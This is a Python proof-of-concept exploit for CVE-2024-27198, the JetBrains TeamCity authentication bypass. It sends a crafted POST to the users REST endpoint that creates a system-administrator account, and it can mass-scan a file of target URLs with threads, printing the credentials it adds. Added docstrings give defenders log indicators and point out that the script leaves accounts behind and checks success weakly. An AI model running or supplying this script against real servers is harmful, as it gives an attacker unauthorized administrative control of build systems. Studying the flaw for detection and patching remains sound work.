CVE-2024-27198.py
#!/usr/bin/env python3
import os
import time
import binascii
import requests
import argparse
from rich.console import Console
from alive_progress import alive_bar
from urllib3.exceptions import InsecureRequestWarning
from concurrent.futures import ThreadPoolExecutor, as_completed
# Shared rich Console used by the functions below for styled terminal output.
color = Console()
def ascii_art():
    """Print the script's banner rows in bold yellow, followed by the author credit line."""
    banner_rows = (
        " ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ███████╗ ██╗ █████╗ █████╗",
        "██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗╚════██║███║██╔══██╗██╔══██╗",
        "██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗ █████╔╝ ██╔╝╚██║╚██████║╚█████╔╝",
        "██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ██╔╝ ██║ ╚═══██║██╔══██╗",
        "╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████╗ ██║ ██║ █████╔╝╚█████╔╝",
        " ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚════╝ ╚════╝",
    )
    print("")
    for row in banner_rows:
        # Each row is wrapped in the same rich markup tags the banner has always used.
        color.print("[bold bright_yellow]" + row + "[/bold bright_yellow]")
    print("")
    print("Coded By: K3ysTr0K3R --> I am the master, you are the student.")
    print("")
# Silence urllib3's InsecureRequestWarning: every request in this script is sent
# with verify=False, i.e. TLS certificate verification is turned off.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Request path appended verbatim to each target URL. For defenders, the query
# string "jsp=/app/rest/users;.jsp" is the distinctive part: a POST carrying it is
# worth searching for in TeamCity and reverse-proxy access logs.
path = '/hax?jsp=/app/rest/users;.jsp'
# Headers sent with every request. The User-Agent is a fixed string, so it can
# corroborate a log match but is a weak indicator on its own.
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36',
}
def random_credentials(length=10):
    """Return a random lowercase hex string derived from ``length`` bytes of ``os.urandom``.

    The returned string is ``2 * length`` characters long, because each random
    byte is rendered as two hex digits.
    """
    raw_bytes = os.urandom(length)
    return raw_bytes.hex()
def generate_user_data():
    """Build the JSON body for the user-creation request.

    Every call yields fresh random values: a 10-hex-character username, a
    10-hex-character password and an e-mail of the form
    ``<10 hex chars>@example.com``. The single requested role is
    ``SYSTEM_ADMIN`` with scope ``"g"`` (presumably the global scope; confirm
    against the TeamCity REST documentation).

    Review note: accounts matching this shape (short hex username,
    ``@example.com`` address, system-administrator role) are what to look for
    when auditing a server's user list for traces of this script.
    """
    username = random_credentials(5)
    password = random_credentials(5)
    email = random_credentials(5) + "@example.com"
    admin_role = {"roleId": "SYSTEM_ADMIN", "scope": "g"}
    return {
        "username": username,
        "password": password,
        "email": email,
        "roles": {"role": [admin_role]},
    }
def find_vuln(target):
    """Send the user-creation POST to ``target`` and print a hit line on apparent success.

    Review notes:
    * Despite its name this is not a read-only check. The request asks the
      server to create an administrator account, and nothing in this script
      removes that account afterwards.
    * Success is inferred only from the generated username appearing in the
      response body. The status code is not inspected, so an endpoint that
      merely echoes request data would be reported as vulnerable.
    * Every exception is swallowed, so an unreachable host and a patched host
      both produce no output.
    * TLS certificate verification is disabled (``verify=False``) and the
      generated password is printed in clear text to the console.
    """
    account = generate_user_data()
    endpoint = target + path
    try:
        reply = requests.post(
            endpoint,
            headers=headers,
            json=account,
            verify=False,
            timeout=7,
            allow_redirects=False,
        )
        if account["username"] not in reply.text:
            return
        color.print(f"[bold bright_green][+][/bold bright_green] Vulnerability Detected | Target: [bold cyan]{target.ljust(22)}[/bold cyan] | Added Credentials: [[bold bright_yellow]Username[/bold bright_yellow]: [bold bright_green]{account['username']}[/bold bright_green], [bold bright_yellow]Password[/bold bright_yellow]: [bold bright_green]{account['password']}[/bold bright_green]]")
    except Exception:
        # Deliberately silent: failures of any kind leave no trace in the output.
        pass
def exploit(target):
    """Run the single-target flow: send the user-creation POST and narrate the outcome.

    Review notes:
    * The POST is the only network action. The "Adding credentials please
      wait" message and the two-second sleep happen after the request has
      already been answered, so they perform no further work.
    * As in ``find_vuln``, success means only that the generated username
      appears in the response body; the status code is not checked.
    * Any exception (timeout, DNS failure, malformed URL) is reported with the
      same "not vulnerable or addition failed" line, so that message is not
      evidence that a server is patched.
    * The account requested here is never deleted by this script.
    """
    color.print("[bold bright_blue][*][/bold bright_blue] Identifying if the target is vulnerable")
    account = generate_user_data()
    endpoint = target + path
    try:
        reply = requests.post(
            endpoint,
            headers=headers,
            json=account,
            verify=False,
            timeout=7,
            allow_redirects=False,
        )
        if account["username"] not in reply.text:
            color.print("[red][~][/red] The target is not vulnerable")
            return
        color.print(f"[bold bright_green][+][/bold bright_green] Vulnerability identified on [bold cyan]{target}[/bold cyan]")
        color.print("[bold bright_blue][*][/bold bright_blue] Adding credentials please wait")
        time.sleep(2)
        color.print("[bold bright_blue][*][/bold bright_blue] Successfully added credentials")
        color.print(f"[bold bright_green][+][/bold bright_green] Username: {account['username']}")
        color.print(f"[bold bright_green][+][/bold bright_green] Password: {account['password']}")
        color.print("[bold bright_blue][*][/bold bright_blue] Have a nice day! :)")
    except Exception:
        color.print("[red][~][/red] The target is not vulnerable or addition failed")
def scan_from_file(target_file, threads):
    """Run ``find_vuln`` over every line of ``target_file`` using a thread pool.

    Args:
        target_file: Path to a text file with one target URL per line.
        threads: Worker count passed to ``ThreadPoolExecutor``.

    Review notes:
    * Lines are stripped but not filtered, so blank lines become empty-string
      targets and still count towards the progress bar.
    * ``find_vuln`` sends the account-creating POST, so each listed host that
      answers as vulnerable is left with a new administrator account.
    * The completed/failed lists are filled in but never read or returned.
      ``find_vuln`` catches ``Exception`` itself, so the failed list is
      expected to stay empty.
    """
    with open(target_file, "r") as handle:
        targets = [line.strip() for line in handle]

    if not targets:
        return

    completed_tasks = []
    failed_tasks = []

    progress = alive_bar(
        len(targets), title="Scanning Targets", bar="smooth", enrich_print=False
    )
    with progress as bar, ThreadPoolExecutor(max_workers=threads) as pool:
        pending = {pool.submit(find_vuln, target): target for target in targets}
        for done in as_completed(pending):
            target = pending[done]
            try:
                done.result()
            except Exception:
                failed_tasks.append(target)
            else:
                completed_tasks.append(target)
            # Advance the progress bar once per finished target.
            bar()
def main():
    """Parse the command line and dispatch to single-target or file mode.

    ``--url`` takes precedence over ``--file``. ``--threads`` is only used in
    file mode and falls back to 1 when omitted. With neither ``--url`` nor
    ``--file`` the help text is printed.
    """
    ascii_art()

    cli = argparse.ArgumentParser(description='A PoC exploit for CVE-2024-27198 - JetBrains TeamCity Authentication Bypass')
    cli.add_argument('-u', '--url', help='Target URL to exploit')
    cli.add_argument('-f', '--file', help='File containing URLs to scan')
    cli.add_argument('-t', '--threads', help='Set the amount of threads needed for scanning')
    opts = cli.parse_args()

    if opts.url:
        exploit(opts.url)
        return
    if opts.file:
        # The thread count arrives as a string (or None), hence the int() fallback.
        worker_count = int(opts.threads or 1)
        scan_from_file(opts.file, worker_count)
        return
    cli.print_help()


if __name__ == "__main__":
    main()